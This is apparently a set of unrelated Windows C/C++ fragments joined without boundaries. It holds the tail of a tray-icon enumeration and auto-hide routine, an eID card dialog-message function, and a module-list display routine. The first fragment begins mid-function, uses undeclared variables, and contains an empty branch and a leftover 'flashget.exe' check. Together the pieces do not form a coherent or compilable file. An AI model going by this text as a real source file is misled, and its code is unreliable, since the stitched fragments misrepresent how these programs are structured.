wchar_t Tipwchar_t = 0;
wchar_t sTip[1024] = L"\0";
wchar_t* pTip = NULL;
int x = 0,iRet = 0;
j = 0;
int iBtnCount = SendMessage(hTrayWnd,TB_BUTTONCOUNT,0,0);
DWORD lExID = 0;
for(i=0; i < iBtnCount;i++)
{
if (i <= 100)
{
}
else
{
break;
}
SendMessage(hTrayWnd,TB_GETBUTTON,i,(LPARAM)data.GetData());
data.ReadData(&tb);
data.ReadData(&tray,(void * )tb.dwData);
if (!(tb.fsState & TBSTATE_HIDDEN))
{
GetWindowThreadProcessId(tray.hwnd,&lPID);
if(lPID == GetCurrentProcessId())
{
continue;
}
memset(&iconInfo,0,sizeof(iconInfo));
if(GetIconInfo(tray.hIcon,&iconInfo) == 0)
{
DWORD dwErr = GetLastError();
tray.hIcon = hIcon_Unknown;
//GetProcessTrayIcon(lPID,&tb,&tray);
}
if(iconInfo.hbmColor != NULL)
{
DeleteObject(iconInfo.hbmColor);
}
if(iconInfo.hbmMask != NULL)
{
DeleteObject(iconInfo.hbmMask);
}
g_QuickHideAllTray_au[j].bHide = tb.idCommand;//Use this member save idcommand for hide or show
g_QuickHideAllTray_au[j].cWndTitle = NULL;
//g_QuickHideAllTray_au[j].cIconTip = new wchar_t[1024];
//memset(g_QuickHideAllTray_au[j].cIconTip,0,1024 * sizeof(wchar_t));
memset(g_QuickHideAllTray_au[j].cProcessName,0,30 * sizeof(wchar_t));
GetWindowThreadProcessId(hTrayWnd,&lExID);
if(lExID == lPID)
{
wcscpy(g_QuickHideAllTray_au[j].cProcessName,L"explorer.exe");
}
//g_QuickHideAllTray_au[j].trayicon = tray;
g_QuickHideAllTray_au[j].trayicon.hIcon = tray.hIcon;
g_QuickHideAllTray_au[j].trayicon.hwnd = tray.hwnd;
g_QuickHideAllTray_au[j].trayicon.Reserved[0] = tray.Reserved[0];
g_QuickHideAllTray_au[j].trayicon.Reserved[1] = tray.Reserved[1];
g_QuickHideAllTray_au[j].trayicon.uCallbackMessage = tray.uCallbackMessage;
g_QuickHideAllTray_au[j].trayicon.uID = tray.uID;
g_QuickHideAllTray_au[j].lPID = lPID;
g_QuickHideAllTray_au[j].hWnd = NULL;
g_QuickHideAllTray_au[j].Next = NULL;
memset(sTip,0,1024*(sizeof(wchar_t)));
x = 0;
pTip = (wchar_t*)tb.iString;
do
{
if(x >= 1000)
{
wcscpy(sTip,L"[ToolTip was either too long or not set]");
break;
}
data.ReadData_Tip((wchar_t*)&Tipwchar_t, (void *)pTip++);
}while( x < 1000 && (sTip[x++] = Tipwchar_t));
iRet = 0;
wcscpy(g_QuickHideAllTray_au[j].cIconTip,sTip);
{
memset(cProcessName,0,1024*sizeof(wchar_t));
GetProcessName(lPID,cProcessName);
if(wcscmp(cProcessName,L"flashget.exe") == 0)
{
int j = 0;
}
int bInList = IsInAutoHideList(cProcessName);
if(bInList == 1)
{
BKThisIcon(g_QuickHideAllTray_au + j);
}
}
j ++;
}
}
return 1;
}
std::wstring CLang::GetMessageFromID(DlgMessageID messageID)
{
std::wstring csMessage=L"";
unsigned char separator;
#ifdef WIN32
separator = '\\';
#else
separator = '/';
#endif
switch( messageID )
{
case DLG_MESSAGE_TESTCARD:
csMessage+=GETSTRING_DLG(TheRootCertificateIsNotCorrect);
csMessage+=L"\n";
csMessage+=GETSTRING_DLG(ThisMayBeATestCard);
csMessage+=L"\n\n";
csMessage+=GETSTRING_DLG(DoYouWantToAcceptIt);
break;
case DLG_MESSAGE_ENTER_CORRECT_CARD:
csMessage+=GETSTRING_DLG(PleaseEnterTheCorrectEidCard);
break;
case DLG_MESSAGE_USER_WARNING:
{
wchar_t fullpath[PATH_LENGHT];
wcscpy_s(fullpath,PATH_LENGHT,L"");
const wchar_t *exename=NULL;
wchar_t *partPath = fullpath;//current (sub)folder name
wchar_t *nextPartPath = fullpath;//next (sub)folder name
wchar_t *startOfLine = fullpath;//start of (part of) path that is not yet copied
GetProcessName(fullpath,PATH_LENGHT);
if(wcslen(fullpath)==0)
{
wcscpy_s(fullpath,PATH_LENGHT,GETSTRING_DLG(UnknownApplication));
exename=fullpath;
}
else
{
exename=wcsrchr(fullpath,separator);
if(exename==NULL)
exename=L"???";
else
exename++;
}
csMessage+=GETSTRING_DLG(TheFollowingApplication1IsTrying);
csMessage.replace(csMessage.find(L"%1"),2,exename);
csMessage+=L"\n\n\n\n\n";
csMessage+=GETSTRING_DLG(PathOfTheApplication);
csMessage+=L"\n\n";
nextPartPath=wcschr(partPath,separator);
while(nextPartPath != NULL)
{
nextPartPath++;//skip separator
if((nextPartPath-startOfLine)>48)
{
csMessage+=L"\n";
startOfLine = nextPartPath;
}
csMessage.append(partPath,(nextPartPath-partPath));
//csMessage+=L" ";
partPath = nextPartPath;
nextPartPath=wcschr(partPath,separator);
}
if((wcslen(partPath)+(partPath-startOfLine))>48)
{
csMessage+=L"\n";
}
csMessage+=partPath;
//csMessage+=fullpath;
}
break;
case DLG_MESSAGE_SDK35_WARNING:
csMessage+=GETSTRING_DLG(OldSDK35Notification);
break;
case DLG_MESSAGE_NONE:
default:
break;
}
return csMessage;
}
int SystemModuleInformation::MODULE_INFO::Insert( CSystemInfoListCtrl& list, BOOL bPid,
size_t iItem, size_t iItemCount) const
{
iItem; // use var
iItemCount; // use var
CString strPID, strProcesName;
CString strBase, strLength, strUsage, strFileSize, strVersion, strFilePath;
// Get size
INT64 i64FileSize = 0;
LPCTSTR szFileName = _tcslen(FileFullPath) > 0 ? FileFullPath : FullPath;
CFile file;
if ( file.Open( szFileName, CFile::modeRead ) )
{
i64FileSize = file.GetLength();
file.Close();
}
strBase.Format( _T("0x%08IX"), Handle );
strLength.Format( _T("%d"), info.SizeOfImage );
if( me32.GlblcntUsage == 0 )
strUsage.Format( _T("") );
else if( me32.GlblcntUsage == 65535 )
strUsage = LocLoadString(IDS_MODULE_FIXED);
else
strUsage.Format( _T("%d"), me32.GlblcntUsage );
strFileSize.Format( _T("%I64d"), i64FileSize );
GetModuleVersion( szFileName, strVersion );
strFilePath = FullPath;
if( _tcsicmp( FullPath, szFileName ) != 0 )
{
strFilePath += _T(" ==> ");
strFilePath += FileFullPath;
}
int sub = 0;
int iListItemCount = list.GetItemCount();
int nPos = list.InsertItem( iListItemCount, _T("") );
list.SetItemText( nPos, sub+0, strBase );
list.SetItemText( nPos, sub+1, strLength );
if( bPid )
{
strPID.Format( _T("%d"), ProcessId );
list.SetItemText( nPos, sub+2, strPID );
sub++;
strProcesName = GetProcessName( ProcessId );
list.SetItemText( nPos, sub+2, strProcesName );
sub++;
}
list.SetItemText( nPos, sub+2, strUsage );
list.SetItemText( nPos, sub+3, Name );
list.SetItemText( nPos, sub+4, strFileSize );
list.SetItemText( nPos, sub+5, strVersion );
list.SetItemText( nPos, sub+6, strFilePath );
return nPos;
}
